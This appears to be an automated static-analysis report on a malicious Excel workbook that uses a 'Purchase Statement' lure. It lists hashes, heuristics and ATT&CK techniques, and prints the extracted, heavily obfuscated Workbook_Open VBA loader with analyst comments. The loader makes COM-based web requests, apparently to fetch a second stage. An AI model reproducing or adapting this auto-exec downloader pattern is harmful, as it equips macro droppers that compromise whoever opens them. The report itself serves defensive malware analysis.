Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 17d72b64168aa3e1…

MALICIOUS

Office (OOXML)

21.8 KB Created: 2010-07-22 03:25:32 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2021-10-26
MD5: 6e5f1c47f891f07a0584bbb53b0910ee SHA-1: 5bef5ed05874c92400cb1f0aea59c620f5b9f614 SHA-256: 17d72b64168aa3e10914de09e19c3730bb1989ff5810f3acc3c4c385cec4fca0
228 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The sample is an Excel document with a Workbook_Open macro that hides its behaviour behind custom string-decoding functions and instantiates COM objects via CreateObject. The macro's primary function appears to be downloading and executing a second-stage payload, as indicated by the critical heuristic 'Obfuscated auto-exec VBA loader' and the use of CreateObject. The document body presents a 'Purchase Statement' lure to persuade users to enable macros, a common social engineering tactic.

Heuristics 7

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 7260 bytes
SHA-256: 09b9fc288151120a9a004573a351c651efd574173e82281b5b3474e2cd7f6159
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Auto-exec entry point: Excel runs Workbook_Open when the workbook is
' opened (subject to the macro security settings in effect). Its only
' work is to call l1ll, which in turn calls l1ll1 in Module1 — two
' layers of indirection between the auto-exec trigger and the loader body.
Private Sub Workbook_Open()
Call l1ll
End Sub
' Pass-through wrapper: forwards the auto-exec call to l1ll1 (Module1).
' Adds no behaviour of its own; it is only an extra hop in the call chain.
Private Sub l1ll()
Call l1ll1
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Option Explicit
' Win32 Sleep imported from kernel32: the PtrSafe/LongPtr form under VBA7
' (64-bit-capable Office), the classic Long form otherwise.
' Sleep is not called anywhere in the visible part of this listing.
#If VBA7 Then
Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal l1ll11 As LongPtr)
#Else
Public Declare Sub Sleep Lib "kernel32" (ByVal l1ll11 As Long)
#End If
' Loader body, reached via Workbook_Open -> l1ll -> l1ll1.
' Every string literal below is a (tag, blob) pair handed to the decoder
' l1l11, which is not present in the visible part of the listing, so the
' plain ProgIDs, request target and message text cannot be read off this
' source. l1l1 and l1lll are likewise not visible in this excerpt
' (possibly in the truncated tail).
Sub l1ll1()
' l1l11l is declared but never used in the visible code.
Dim l1ll11, l1l11l
' Three CreateObject calls assign the same variable in turn; the first two
' references are overwritten before use, and only the third object reaches
' the If test below.
Set l1ll11 = CreateObject(l1l11("lsusddcfbc", "SG/x>Hby4+vA<3"))
Set l1ll11 = CreateObject(l1l11("wnceiliubn", "`{D3>?}KB#:<Un:s68|K6E,0"))
Set l1ll11 = CreateObject(l1l11("hrikyehrap", "Z""!>L>B;^v:@=4"))
' The If condition itself does the work: l111l (below) fetches and rewrites
' text, l1lll transforms it, and l1l1 is applied to it together with the COM
' object. A decoded message box is shown on either branch; the branches
' differ only in which message and title are displayed.
If l1l1(l1ll11, l1lll(l111l(l1l11("nobfnafogm", "h,>F;CD:IA/8")))) Then
MsgBox l1l11("cekttifckn", "V22L#B@VL;A?HTJ@A15@@HD1I8,9=F%GM54G?.GMaE#,@5O4P/.9L5@M<:0B54.?J7?6IH.>6IK$9L=63/F*=J@BM<E02V+>2G>;2%DZ<G/>1872X"), vbOKOnly, l1l11("spbfpzbpft", "''3><GIE?>V|R-<?")
Else
MsgBox l1l11("hgrpufiyfu", "~z;I/J5H@B6:EPS7?$132RJCF.<EF3:@C%D;G.>FgK!1AMN)M&>BIAHB..7701*HA522<:8DHFA4EU*K,%6:1R@9FBK.7WC='D5K/1LO.;63,53;O"), vbOKOnly, l1l11("qisnwriapp", "kz@.4?C@5NIr:)>F")
End If
End Sub
' Fetches text through l1l1l and post-processes it.
' The parameter l1ll1l is only tested with IsNull; it does not feed the
' request. The request argument is built from a decoded constant (l111ll)
' with decoded placeholder substrings swapped out by Replace before each
' l1l1l call.
' NOTE(analysis): VBA's And does not short-circuit, so the l1l1l call in
' the If condition runs whenever this function is entered, and when the
' condition holds a second l1l1l call follows with a different
' substitution — two fetches per invocation.
' NOTE(analysis): l1l1l never yields Null (it returns ResponseText, or
' Empty on a non-200 status), so the IsNull test on its result is
' effectively always satisfied; this guard does not catch a failed fetch.
Function l111l(ByVal l1ll1l)
Dim l1ll11, l111ll
l111ll = Replace(l1l11("gvhcdcllkl", "GjXiABt]V43J`B6A,J.;9>>;@6E13G`+?:b;274E+(57.<:V(5,-8?3j^XP?4,I[D-@5c:Q@"), l1l11("oyrifykudz", "]h"), l1l11("rxeepxfwqn", "D["))
If (IsNull(l1ll1l) = False) And (IsNull(l1l1l(Replace(l111ll, l1l11("cnrlqghjsw", "xcch"), l1l11("yixlygkplm", "r:@9")))) = False) Then
l1ll11 = l1l1l(Replace(l111ll, l1l11("ezhjnereml", "_pm_"), l1l11("afcicyomvn", "{:7;")))
' Three Replace passes rewrite the fetched text before it is returned;
' the search/replacement pairs are decoded at run time.
l1ll11 = Replace(l1ll11, l1l11("rxeepxfwqn", "Gl"), l1l11("wbfhvlfbgy", "tN"))
l1ll11 = Replace(l1ll11, l1l11("nobfnafogm", "jF"), l1l11("zvqazlmeuj", "K*"))
l1ll11 = Replace(l1ll11, l1l11("nvplfuuuip", "?M"), l1l11("rxeepxfwqn", "(! wtp""u"))
Else
' Decoded message shown when the guard fails; l1ll11 stays Empty.
MsgBox l1l11("orqhzwayvh", "v'+Q*?>J8CAI;_OC@./?:UBAR>;F7D8CB.9=<.38PW*=<IN'?622Q<=K0&8B?'9DM6<0HB;<FRQ3FF;I/$?/3G@.8+W7CR?=%6E?7,AX037>;+B7["), vbOKOnly, l1l11("lqvyxwqxre", "u(66:A7F(ITjL.;0")
End If
' Returns the rewritten response text, or Empty if the Else branch ran.
l111l = l1ll11
End Function
' Performs a request through a late-bound COM object and returns the body.
' The ProgID and the verb passed to .Open are decoded at run time; the
' .Open(verb, target, False) / .send / .Status / .ResponseText shape
' matches an XMLHTTP-style request object (False = synchronous). That is
' inferred from the member names only — the ProgID is not readable here.
' Parameter l1l1ll is passed straight through as the second .Open argument.
' Returns ResponseText when .Status = 200; otherwise shows a decoded message
' and returns Empty (the function name is never assigned on that path).
' There is no On Error handling in this function, so a COM or transport
' error propagates to the caller.
Function l1l1l(l1l1ll)
Dim l1ll1l, l1llll
Set l1ll1l = CreateObject(l1l11("dzmockkywr", "Ew$2|sl[(}!m$$"""))
l1ll1l.Open l1l11("axteqyeowo", "]pmx"), l1l1ll, False
l1ll1l.send
If l1ll1l.Status = 200 Then
l1llll = l1ll1l.ResponseText
l1l1l = l1llll
Else
MsgBox l1l11("mgohwhauam", "u%9Q)J'X:;JKKPN:A&-F9G6CE3D?HA7@U9D>E*IMZWz79<J.H(,@Q;H4>(0KA7*CD74.OA-0HEF<?W8H,7J:4P<DM5W(=O29,?797+LA>5/G=;36R"), vbOKOnly, l1l11("wwyacgywtc", "g(?'?D;B17E{D&<A")
End If
End Function
Function l11l()
Dim l11111 As Variant
Dim l1lll1 As Long
Dim l11lll As String
Dim l11ll1 As Integer
l11ll1 = 10
l11111 = Array(l1l11("orqhzwayvh", "q1"), l1l11("ncufqnzqri", "+."), l1l11("gvhcdcllkl", "T7"), l1l11("wnceiliubn", "+;"), l1l11("oolizengtt", "_+"), l1l11("mgohwhauam", "{4"), l1l11("lqvyxwqxre", ".B"), l1l11("izqvowxkdx", "a5"), l1l11("oyrifykudz", "E4"), l1l11("zvqazlmeuj", "Q8"), _
l1l11("yohxflvqnd", "n2"), l1l11("lqvyxwqxre", "bG"), l1l11("abnfuueqsy", "NG"), l1l11("wnceiliubn", "wE"), l1l11("mrsxruhgym", "eH"), l1l11("dpihdiipaz", "eI"), l1l11("rrnvicebjm", "N?"), l1l11("ezhjnereml", "<L"), l1l11("cekttifckn", "TN"), l1l11("ucbkagbrwd", "k@"), l1l11("ucbkagbrwd", "VA"), l1l11("ouwldbbeja", "yG"), l1l11("ncufqnzqri", "vC"), l1l11("wbfhvlfbgy", ".N"), _
l1l11("cekttifckn", "jT"), l1l11("owerjznwwc", "tS"), l1l11("kvgrasitph", "W^"), l1l11("lsusddcfbc", "Vg"), l1l11("msrnlxbels", "`k"), l1l11("oyrifykudz", "R]"), l1l11("nvplfuuuip", "G\"), l1l11("gvhcdcllkl", "Ih"), l1l11("gvhcdcllkl", "Ui"), l1l11(
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 27136 bytes
SHA-256: e41344581119cda4ec0caf00f467d95e909facb2a47254278d86fd050dbfd077